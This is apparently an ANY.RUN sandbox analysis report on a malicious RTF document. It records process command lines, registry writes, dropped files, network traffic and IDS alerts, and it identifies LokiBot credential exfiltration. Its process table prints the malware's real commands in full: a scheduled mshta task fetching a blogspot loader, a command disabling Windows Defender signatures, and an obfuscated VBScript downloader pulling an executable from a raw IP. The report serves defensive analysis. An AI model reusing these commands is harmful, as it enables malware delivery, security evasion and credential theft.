| Field | Value |
|---|---|
| File name | 0001.doc |
| Full analysis | https://app.any.run/tasks/45059934-0ced-4247-9a51-6ec0d8d6ca7d |
| Verdict | Malicious activity |
| Threats | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date | January 23, 2019, 08:55:32 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | text/rtf |
| File info | Rich Text Format data, version 1, ANSI |
| MD5 | 6D5EEF8F3DF1D7730F7FF22A4B13B23F |
| SHA1 | 9452DB4D96BA98D72629AC1EB50E4FAE55F7F401 |
| SHA256 | E3C786FEC0479F5AF52D7740E77479014C8863E5E9F0C639095595D999C2D80F |
| SSDEEP | 6144:kX0OPX0OVX0OiX0OXX0O0X0OrX0OxX0Oy:kv1C3ULRS |

| Extension | Detected type |
|---|---|
| .rtf | Rich Text Format (100) |

| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version |
|---|---|---|---|---|---|---|---|---|---|---|
| 3000 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0001.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 1 | 14.0.6024.1000 |
| 3848 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 1 | 14.0.6024.1000 |
| 2732 | mshta.exe https://methodsofcreation.blogspot.com/p/encryption2.html | C:\Windows\system32\mshta.exe | | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Microsoft (R) HTML Application host | 0 | 8.00.7600.16385 (win7_rtm.090713-1255) |
| 3240 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 20 /tn "MSOFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://tinytech997.blogspot.com/p/loader.html\",0,true)(window.close)" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe | admin | Microsoft Corporation | MEDIUM | Manages scheduled tasks | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3832 | "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exit | C:\Windows\System32\cmd.exe | — | mshta.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 128 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2444 | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo AmmEiqWkls = "http://216.170.120.102/kates.exe">>UpdateWindow.vbs &@echo ZIMMER = L0u("NcN`aV[a;ReR")>>UpdateWindow.vbs &@echo Set ZIMMERing = CreateObject(L0u("Z`eZY?;eZYUaa]"))>>UpdateWindow.vbs &@echo ZIMMERing.Open L0u("TRa"), AmmEiqWkls, False>>UpdateWindow.vbs &@echo ZIMMERing.send ("")>>UpdateWindow.vbs &@echo Set FatherOFVidus = CreateObject(L0u("NQ\QO;`a_RNZ"))>>UpdateWindow.vbs &@echo FatherOFVidus.Open>>UpdateWindow.vbs &@echo FatherOFVidus.Type = 1 >>UpdateWindow.vbs &@echo FatherOFVidus.Write ZIMMERing.ResponseBody>>UpdateWindow.vbs & @echo FatherOFVidus.Position = 0 >>UpdateWindow.vbs &@echo FatherOFVidus.SaveToFile ZIMMER, 2 >>UpdateWindow.vbs &@echo FatherOFVidus.Close>>UpdateWindow.vbs &@echo function L0u(K4d) >> UpdateWindow.vbs &@echo For Dintannaa = 1 To Len(K4d) >>UpdateWindow.vbs &@echo BuEllWsWam = Mid(K4d, Dintannaa, 1) >>UpdateWindow.vbs &@echo BuEllWsWam = Chr(Asc(BuEllWsWam)- 13) >>UpdateWindow.vbs &@echo VuzEgEas = VuzEgEas + BuEllWsWam >> UpdateWindow.vbs &@echo Next >>UpdateWindow.vbs &@echo L0u = VuzEgEas >>UpdateWindow.vbs &@echo End Function >>UpdateWindow.vbs& UpdateWindow.vbs &dEl UpdateWindow.vbs & timeout 12 & AVASTINT.EXE | C:\Windows\System32\cmd.exe | — | mshta.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2780 | MpCmdRun.exe -removedefinitions -dynamicsignatures | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Malware Protection Command Line Utility | 2 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2288 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Terminates Processes | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 4072 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\UpdateWindow.vbs" | C:\Windows\System32\WScript.exe | | cmd.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.8.7600.16385 |
| 3720 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Terminates Processes | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |

| PID | Process | Key | Operation | Name | Value |
|---|---|---|---|---|---|
| 3000 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | write | 0t% | 30742500B80B0000010000000000000000000000 |
| 3000 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | Off |
| 3000 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | On |
| 3000 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | WORDFiles | 1312227358 |
| 3000 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | ProductFiles | 1312227472 |
| 3000 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | ProductFiles | 1312227473 |
| 3000 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | write | MTTT | B80B00008CEC2575F9B2D40100000000 |
| 3000 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | write | 6u% | 36752500B80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 3000 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | delete value | 6u% | 36752500B80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 3000 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 0 |

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9810.tmp.cvr | — | — | — |
| 3848 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA29F.tmp.cvr | — | — | — |
| 2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\plusone[1].js | text | E0D238A2B59C86393AB27378ABFA1131 | 0015A708B6D2F12384EE780A36BCB03B5DF66A7DAC9DA2BF0E162F976019492B |
| 2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\encryption2[1].html | html | D065EDDF1666A1F63D6B0AD5B128D31E | 5303DE0730DBEFC2AFB2C7BB4B7E13A24FF1EAA4BA3F4DC572AE303FF864F003 |
| 3000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$01.doc.rtf | pgc | 92CCE27E4D73CDE631BC874B15878DA1 | 483774A3F4004D7DF86E34B1C2DC2867CB13AE585614B49B97F264DA4FF67546 |
| 2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\cb=gapi[1].loaded_1 | text | 603EC60EFE600D441FC21C6FBCB3430B | 2F186A262082026CA95C58DC03685671EC56E5493056BFA4E8D8887E594DF96D |
| 2732 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt | text | FA4D10F8E1819FDFAEA206C788B09BA7 | 0FA5A47702D28E2290FE98B30E934C645E85CB778FFBE2EBAC8CE2CE7AACCE91 |
| 3000 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\99BA1CC.wmf | wmf | F805B2269DCC910D671B2B45FE6CB033 | 631983654C0F69751EB4AC2FD166981E1D7C1F895E1D8405D312092F310C0A3F |
| 2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\211300122-widgets[1].js | text | 12926C0E6033D425F424771F4BBE3A7C | 4DC814BE3C423A930D46F18AD50F1F3DB9B57F4F657DC7ED7C9D1F825F7A9E89 |
| 2732 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1] | — | — | — |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4072 | WScript.exe | GET | 200 | 216.170.120.102:80 | http://216.170.120.102/kates.exe | US | executable | 1.17 Mb | suspicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
3224 | AVASTINT.EXE | POST | — | 103.63.2.245:80 | http://slomiter45u.us/gert/starboy/fre.php | HK | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2732 | mshta.exe | 172.217.22.65:443 | methodsofcreation.blogspot.com | Google Inc. | US | whitelisted |
2732 | mshta.exe | 216.58.210.2:443 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted |
2732 | mshta.exe | 172.217.16.201:443 | www.blogger.com | Google Inc. | US | whitelisted |
2732 | mshta.exe | 172.217.22.14:443 | apis.google.com | Google Inc. | US | whitelisted |
4072 | WScript.exe | 216.170.120.102:80 | — | ColoCrossing | US | suspicious |
2732 | mshta.exe | 172.217.16.141:443 | accounts.google.com | Google Inc. | US | suspicious |
3224 | AVASTINT.EXE | 103.63.2.245:80 | slomiter45u.us | Guochao Group limited | HK | suspicious |
| Domain | IP | Reputation |
|---|---|---|
| methodsofcreation.blogspot.com | | whitelisted |
| www.blogger.com | | shared |
| apis.google.com | | whitelisted |
| pagead2.googlesyndication.com | | whitelisted |
| resources.blogblog.com | | whitelisted |
| accounts.google.com | | shared |
| img1.blogblog.com | | suspicious |
| slomiter45u.us | | malicious |

PID | Process | Class | Message |
---|---|---|---|
4072 | WScript.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
4072 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
4072 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4072 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
4072 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3224 | AVASTINT.EXE | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 4 |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot Checkin |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 |
3224 | AVASTINT.EXE | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 |